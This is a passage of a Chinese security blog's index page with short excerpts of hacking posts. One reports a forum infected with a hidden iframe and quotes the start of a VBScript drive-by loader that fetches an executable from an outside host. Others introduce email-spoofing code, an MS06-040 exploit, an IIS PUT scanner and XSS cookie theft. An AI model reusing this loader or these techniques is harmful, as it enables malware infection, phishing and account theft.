落伍被挂马了
ps:在neeao和CN.Tink那里都看到了这个消息,我综合一下。估计是因为前两天DZ出的新洞被拿的,是一个叫freediscuz的论坛公布的漏洞,不过没有公布详细信息,只给了补丁。
Tags: 挂马, 落伍看了下首页,有这么句,
<iframe src=http://www.lynndent.com/cf/style.htm width=0 height=0></iframe>
然后打开了这个地址..
代码包含
<script language="VBScript">
on error resume next
my = "http://www.lynndent.com/cf/kkk.exe"
Set CAOc = document.createElement("object")
CAOc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
伪造发件人邮件地址
作者:lake2
来源:lake2的专栏
这篇文章完全没技术含量
记得若干年前第一次看《黑客X档案》的时候,有篇名为《社会工程学破解Email》的文章,就是利用邮件冒充管理员里骗取用户密码。当时真的太菜,居然真的照着书上一个一个字符的去打HTML……呵呵,心酸往事不提。
言归正传,发匿名邮件完全有益身心健康的,比如剑心那小子老是剥削我,我心里不爽就发邮件骂他,为了不让他知道我是谁就伪造一个邮件地址咯,再狠点,嗯,邮件地址就写成他老婆的,然后一边呆着看他们吵架(嘿嘿,好狠毒啊)。
基于此,写了一个利用Jmail组件发匿名邮件的ASP代码,前提是你的SMTP服务器没有验证发件人地址才是,很多虚拟主机的SMTP服务器就可以的。
代码如下:
阅读全文 »
Box.net lite + Box.net的一个小技巧
<a href="http://www.box.net/">Box.net</a> 一个操作简单、界面清新、接纳各类型文件、1G免费空间,单个上传文件不得超过10M的网络硬盘服务。<br/>
最近又推出了 <a href="http://www.box.net/lite">Box.net lite</a> ,只要填写好你的邮箱地址,你的昵称,选好本地文件,无需注册,你就可以上传这个文件,并获得一段代码,可以直接嵌入此HTML代码,通过它,与网友分享你上传的文件。 如果你已拥有帐号的话,那么上传的文件则会自动加入到你的Box.net文件箱中。<br/><br/>
<b>图标方式的插入,演示如下:</b><br/>
<a href="http://www.box.net/lite/4tpikc3hxu"><img src="http://www.box.net/lite/image/4tpikc3hxu.png" border="0"></a><br/><small>share your files at <a href="http://www.box.net/lite">box.net</a></small><br/><br/>
基本上支持了所有的文件类型,包括音频、视频、图片和文档,单个文件大小不超过 10MB。<br/> 阅读全文 »
ms06040 NetpwNameCompare exploit
一口气更新了3个,都是在zwell's blog那里看到的。
这个是zwell写的的ms06040 exploit,ms06040最近的确很受欢迎,我这里都放了三个版本的了。
来源:zwell's blog
I coded it just for fun and another reason is the exploits released recently are all about
CanonicalizePathName, but not NetpwNameCompare(even some title is about NetpwNameCompare).
the struct of the function is:
DWORD (__stdcall *NetpwNameCompare)(wchar_t *, wchar_t 阅读全文 »
Tags: Exploit, MS06-040NetHooker v0.3
同样是在zwell's blog看到的,命令行下的抓包工具。
来源:zwell's blog
Version : v0.3
What is Net Hooker?
A tiny tool to catch packets from a specified application. That's all.
Which situation that I could use it?
So, you should think the excellence of it firstly:
tiny
console
demand nothing
catch packets….
How to use it?
It's very easy to use it:
=============================
阅读全文 »
IISPutScanner v1.0
在zwell's blog看到的,扫描判断IIS版本,并能测试是否有写权限,比老兵那个IIS写权限利用程序多了个扫描IIS版本的功能。记得以前第八军团就被人用IIS写权限给留过TXT。
来源:zwell's blog
HTTP support a method named PUT that can upload a file to WEB server, so we can…^_^
Don't be surprise when you find so many servers enable this method, what you think if you want to replace the index page, aha…
阅读全文 »
利用Microsoft.XMLHTTP控件发送COOKIE
来源:s0n9'5 B1o9
跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个问题:
总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句的办法勉强可以作到发送COOKIE不出现IE窗口,但是在实际使用中有时会遇到IE出错。
没有更好的办法了吗?以前在研究VBS病毒自动升级的时候用到一个Microsoft.XMLHTTP控件(该控件是WIN98/2K上都默认自带的东东,并且它是IE认为safe的控件!),通过它我们可以在网页中给网站发送http请求,可以是POST也可以是GET.
好了思路已经到这儿来,下面我们可以实战一下,我以ASPSKY 5.0 0320为例子。我们知道<IMG SRC="XXXXXXX">在SRC中可以写入vbscript:这样的语句。。
阅读全文 »
